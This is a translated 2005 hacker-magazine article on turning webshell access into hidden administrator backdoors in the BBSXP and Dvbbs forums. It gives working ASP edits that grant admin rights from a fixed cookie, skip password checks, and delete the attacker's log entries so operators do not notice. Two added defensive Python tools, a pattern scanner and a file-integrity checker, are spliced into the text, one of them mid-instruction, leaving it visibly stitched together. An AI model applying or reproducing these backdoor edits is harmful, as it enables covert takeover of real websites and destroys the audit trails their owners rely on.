Using a webshell to become a BBS administrator that nobody can see - vulnerability warning - the black bar safety net

2005-10-05T00:00:00
ID MYHACK58:6220053588
Type myhack58
Reporter Anonymous (佚名)
Modified 2005-10-05T00:00:00

Description

Author: Snakehu & Senarie. Source: Evil Octal. This article was published in the 2005-10 issue of Hacker Line of Defense.

Objective: use the webshell to modify the forum's original files so that you become an administrator, in a way that the real administrators would normally not discover.

Purpose: to make things easy for everyone. Anyone who knows a little ASP could work this out, but testing it yourself costs a lot of time.

Once you have a webshell, how do you control the forum? The question may sound redundant: the webshell is usually obtained through the forum itself, so how could this situation arise? But forums are getting more and more secure, and until a new vulnerability is found the latest version of a forum is usually very hard to break. A site always has some weak point, though: the injection, upload and side-site ("sidenote") vulnerabilities that are so popular among newbies can all give us a webshell. Many people will ask: once you have a webshell, why worry about taking over the forum? Just change the data. But that is exactly the problem: the admin is fine one day and suddenly finds an extra administrator account. What do you think he will do? Probably a thorough check, and maybe our webshell gets ferreted out too. Since we already have a webshell, why not play tricks inside the forum itself?

1. BBSXP (version: up to 5.1)

Description

(1) Becoming a front-end master

Create a new file include.asp with the following content:

<%
if Request.Cookies("username")="snake" then
    membercode=5
end if
%>

At the tail of setup.asp, add the following line:

<!-- #include file="include.asp" -->

Be sure to put it at the tail: if you add it at the head, membercode is later reset to its original value. This way you become an "invisible" administrator.

(2) Becoming a back-end master

In admin.asp, look at the sub pass(), around line 53:

session("pass")=md5(""&Request("pass")&"")
if adminpassword<>session("pass") then error2("community management password incorrect")

This is the back-end password check. We change it to:

if Request.Cookies("username")<>"snake" then
    session("pass")=md5(""&Request("pass")&"")
    if adminpassword<>session("pass") then error2("community management password incorrect")
end if

In summary: with a webshell you do not even need to read the database. Open the file and wrap whichever password check you dislike in an IF statement. Control the condition well, and once you have logged in those checks simply...... Then add this paragraph:

If Request.Cookies("username")="snake" Then
    Session("pass")=adminpassword
End If

Now go into the back end and type any password. OK! You are in. Although others cannot see through the normal channels that you are a master, do not forget BBSXP's log. Since we have a webshell, is that hard to change as well? On line 164 of admin.asp you can see this statement:

conn.execute("delete from [log] where logtime<"&SqlNowString&"-7")

This is why the log is only kept for 7 days. Right after it we add:

conn.execute("delete from [log] where username='snake'")

So every time someone logs in to the back end, our operations are wiped.

2. Dvbbs (version: 7.0 AC; I am a hopeless newbie and none of my chickens (compromised hosts) run 7.1, oh God!)

(1) Becoming a front-end master

Everyone should be very familiar with Dvbbs (the Dongwang forum). Its permission check is done in /inc/Dv_ClsMain.asp, so giving ourselves front-end administrator rights naturally starts there. Dvbbs identifies users by UserGroupID, and 1 corresponds to administrator. So search Dv_ClsMain.asp for UserGroupID and go to lines 614-623:
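As an added defender's-side example (not code from the article or from the BBSXP or Dvbbs projects), here is a small Python scanner for the edit patterns just described: a privilege variable assigned when a client cookie equals a literal, a password check wrapped in a cookie condition, an include appended after a file's last code block, and a log-deletion query keyed on a username. The rule list generalises slightly beyond BBSXP: it also matches the UserGroupID and session("flag") variants used for Dvbbs in section 2 and a login routine branching on a literal username. The ASP sample texts at the bottom are constructed for this example from the article's own snippets and are not real forum files.

```python
"""Heuristic scanner for the backdoor edits described in this article.

Added example; this is not code from the article or from BBSXP/Dvbbs. It
scans classic ASP source text for the edit patterns the article uses and
reports each hit with its line number. The ASP samples at the bottom are
constructed for this example from the article's own snippets.
"""
import re
from typing import List, Tuple

Finding = Tuple[int, str, str]  # (line number, rule name, offending source line)

# Variables the article assigns to gain rights. The list is a generalisation:
# membercode is BBSXP; UserGroupID and session("flag") are Dvbbs.
PRIV_TARGETS = r'(?:membercode|UserGroupID|session\s*\(\s*"(?:pass|flag)"\s*\))'
COOKIE_EXPR = r'Request\.Cookies\s*\([^)]*\)(?:\s*\([^)]*\))?'  # also Cookies(x)("y")

RULES = [
    # if Request.Cookies("username")="snake" then membercode=5
    ("cookie-gated privilege",
     re.compile(COOKIE_EXPR + r'\s*=\s*"[^"]*"\s*then\s+' + PRIV_TARGETS + r'\s*=', re.I)),
    # if Request.Cookies("username")<>"snake" then   <- wraps the real password check
    ("cookie-gated auth bypass",
     re.compile(COOKIE_EXPR + r'\s*<>\s*"[^"]*"\s*then\s*(?:\r?\n|$)', re.I)),
    # if username<>"snake" then   <- a login routine branching on a literal name
    ("literal-username auth branch",
     re.compile(r'\bif\s+username\s*<>\s*"[^"]*"\s*then\b', re.I)),
    # delete from [log] where username='snake'
    ("log tampering by username",
     re.compile(r'delete\s+from\s+\[?log\]?\s+where\s+\W*username\W*\s*=', re.I)),
]
INCLUDE_RE = re.compile(r'<!--\s*#include\s+(?:file|virtual)\s*=', re.I)


def _line_no(text: str, pos: int) -> int:
    return text.count("\n", 0, pos) + 1


def scan_source(text: str) -> List[Finding]:
    """Return sorted findings for one ASP source file."""
    lines = text.splitlines()
    findings: List[Finding] = []
    for name, pattern in RULES:
        for m in pattern.finditer(text):
            n = _line_no(text, m.start())
            findings.append((n, name, lines[n - 1].strip()))
    # The article appends its include to the *tail* of setup.asp so that the
    # assignment runs after the file's own initialisation. An include that sits
    # after the last server-side block of a configuration file deserves a look.
    last_block = text.rfind("%>")
    for m in INCLUDE_RE.finditer(text):
        if m.start() > last_block:
            n = _line_no(text, m.start())
            findings.append((n, "include after last code block", lines[n - 1].strip()))
    return sorted(findings)


# --- constructed samples (stand-ins, not real forum files) ----------------
SAMPLE_SETUP_ASP = '<%\nDim membercode\nmembercode = 0\n%>\n<!-- #include file="include.asp" -->\n'
SAMPLE_INCLUDE_ASP = '<%\nIf Request.Cookies("username") = "snake" Then\n    membercode = 5\nEnd If\n%>\n'
SAMPLE_ADMIN_ASP = (
    '<%\nSub pass()\n'
    'if Request.Cookies("username")<>"snake" then\n'
    'session("pass")=md5(""&Request("pass")&"")\n'
    'if adminpassword<>session("pass") then error2("community management password incorrect")\n'
    'end if\n'
    'conn.execute("delete from [log] where logtime<"&SqlNowString&"-7")\n'
    "conn.execute(\"delete from [log] where username='snake'\")\n"
    'End Sub\n%>\n'
)
SAMPLE_DVBBS_LOGIN = (
    '<%\nSub chklogin()\n'
    'if username<>"snake" then\n'
    '    set rs=Dvbbs.Execute("select * from "&admintable&" where username=\'"&username&"\'")\n'
    'else\n'
    '    session("flag")="1,2,3,4,5,6"\n'
    'end if\nEnd Sub\n%>\n'
)
SAMPLE_CLEAN_ASP = (
    '<%\nsession("pass")=md5(""&Request("pass")&"")\n'
    'if adminpassword<>session("pass") then error2("community management password incorrect")\n'
    'conn.execute("delete from [log] where logtime<"&SqlNowString&"-7")\n%>\n'
)

if __name__ == "__main__":
    for fname, src in [("setup.asp", SAMPLE_SETUP_ASP), ("include.asp", SAMPLE_INCLUDE_ASP),
                       ("admin.asp", SAMPLE_ADMIN_ASP), ("admin_index.asp", SAMPLE_DVBBS_LOGIN),
                       ("clean.asp", SAMPLE_CLEAN_ASP)]:
        for n, rule, line in scan_source(src) or [(0, "no findings", "")]:
            print(f"{fname}:{n}: {rule}: {line}")
```

The rules are deliberately loose string heuristics rather than a VBScript parser, so treat hits as leads for a manual read of the file, and expect the tail-include rule to need an allowlist on real sites whose pages legitimately end with footer includes.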

Select Case UserGroupID
    Case 8
        Vipuser = True
    Case 3
        Boardmaster = True
    Case 2
        Superboardmaster = True
    Case 1
        Master = True
End Select

This is where the identity is decided. Right before it, add the following:

if Request.Cookies(Forum_sn)("username")="snake" then
    UserGroupID=1
end if

(2) Becoming a back-end master

The back-end login check is in admin_index.asp. Look at chklogin(), lines 319-342; we modify it as follows:

'======================== By Snakehu
if username<>"snake" then
'======================== By Snakehu
    set rs=Dvbbs.Execute("select * from "&admintable&" where username='"&username&"' and adduser='"&dvbbs.membername&"'")
    if rs.eof and rs.bof then
        rs.close
        set rs=nothing
        Response.Redirect "showerr.asp?action=OtherErr&ErrCodes=<li>The username or password you entered is incorrect, or you are not a system administrator. Please <a href=admin_login.asp>re-enter</a> your password.<b>After returning, please refresh the login page before entering the correct information.</b>"
        exit sub
    else
        if trim(rs("password"))<>password then
            Response.Redirect "showerr.asp?action=OtherErr&ErrCodes=<li>The username or password you entered is incorrect, or you are not a system administrator. Please <a href=admin_login.asp>re-enter</a> your password.<b>After returning, please refresh the login page before entering the correct information.</b>"
            exit sub
        else
            session("flag")=rs("flag")
            session.timeout=45
            Dvbbs.Execute("update "&admintable&" set LastLogin="&SqlNowString&",LastLoginIP='"&ip&"' where username='"&username&"'")
            rs.close
            set rs=nothing
            response.redirect "admin_index.asp"
        end if
    end if
'======================== By Snakehu
else
    session("flag")="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36"
    session.timeout=45
    response.redirect "admin_index.asp"
end if
'======================== By Snakehu
end sub

Explanation: session("flag") is what decides permissions. Each number corresponds to one back-end module (layout); if the flag for that module is present you get it, otherwise an error page pops up. Because I, a newbie, do not have a broiler with 7.1 installed, I had to experiment on 7.0 AC. I think the method for 7.1 is roughly the same, but I remember the admin_login.asp code in 7.1 is different, so you may have to adapt it yourselves. Now enter "Management" from the front end, type the username snake and any password. Wow, finally in, lovely back end! As for the Dvbbs log, the treatment is almost the same as for BBSXP, so not much to say. Or else, on line 223 of admin_log.asp, in (""D"",l_addtime,"&SqlNowString&")>2, change the 2 to 0. The idea is that the delete operation normally keeps logs from the last 2 days; changed to 0, it deletes them all. That is it. If anything is wrong, please tell me in the forum. This is my first write-up.
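Every trick in this article, for BBSXP and Dvbbs alike, works by editing the forum's own files (setup.asp, admin.asp, inc/Dv_ClsMain.asp, admin_index.asp, admin_log.asp) or dropping a new include.asp beside them, and it leaves the user table untouched, which is exactly why an admin who only audits accounts never sees it. The following Python file-integrity check is an added example, not code from the article or from either forum project: it hashes every server-side script under a web root, then diffs a later manifest against the baseline. The web root and its file contents are constructed in a temporary directory for the example.

```python
"""File-integrity baseline for a classic-ASP web root.

Added example, not code from the article or from BBSXP/Dvbbs. A SHA-256
manifest taken from a known-good install exposes the article's edits: the
modified files show up as modified and the dropped include as added.
The web root below is constructed in a temporary directory for the example.
"""
import hashlib
import os
import tempfile
from typing import Dict, Set

SCRIPT_EXTS = (".asp", ".asa", ".inc")


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map every server-side script under root (relative POSIX path) to its hash."""
    manifest: Dict[str, str] = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(SCRIPT_EXTS):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                manifest[rel] = sha256_file(full)
    return manifest


def diff_manifests(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, Set[str]]:
    """Classify every path as added, removed or modified relative to the baseline."""
    common = baseline.keys() & current.keys()
    return {
        "added": set(current) - set(baseline),
        "removed": set(baseline) - set(current),
        "modified": {p for p in common if baseline[p] != current[p]},
    }


def _write(root: str, rel: str, text: str) -> None:
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as f:
        f.write(text)


def demo() -> Dict[str, Set[str]]:
    """Baseline a constructed web root, replay the article's edits, and diff."""
    with tempfile.TemporaryDirectory() as root:
        # Known-good state (constructed stand-ins, not the real forum sources).
        _write(root, "setup.asp", "<%\nDim membercode\nmembercode = 0\n%>\n")
        _write(root, "admin.asp", '<%\nsession("pass")=md5(""&Request("pass")&"")\n%>\n')
        _write(root, "inc/Dv_ClsMain.asp", "<%\nSelect Case UserGroupID\nCase 1\nMaster = True\nEnd Select\n%>\n")
        _write(root, "images/logo.gif", "not a script, ignored by the manifest")
        baseline = build_manifest(root)

        # The edits the article describes: an include appended to the tail of
        # setup.asp, a new include.asp beside it, and a wrapped password check.
        with open(os.path.join(root, "setup.asp"), "a", encoding="utf-8") as f:
            f.write('<!-- #include file="include.asp" -->\n')
        _write(root, "include.asp", '<%\nIf Request.Cookies("username") = "snake" Then membercode = 5\n%>\n')
        _write(root, "admin.asp",
               '<%\nif Request.Cookies("username")<>"snake" then\n'
               'session("pass")=md5(""&Request("pass")&"")\nend if\n%>\n')

        return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {sorted(paths)}")
```

Keep the baseline manifest off the web server and sign it: a webshell that can rewrite admin.asp can just as easily rewrite a manifest stored next to it. Running the diff from a scheduled job on another host, and alerting on any change to the files named in this article, turns the "invisible" administrator into a very visible one.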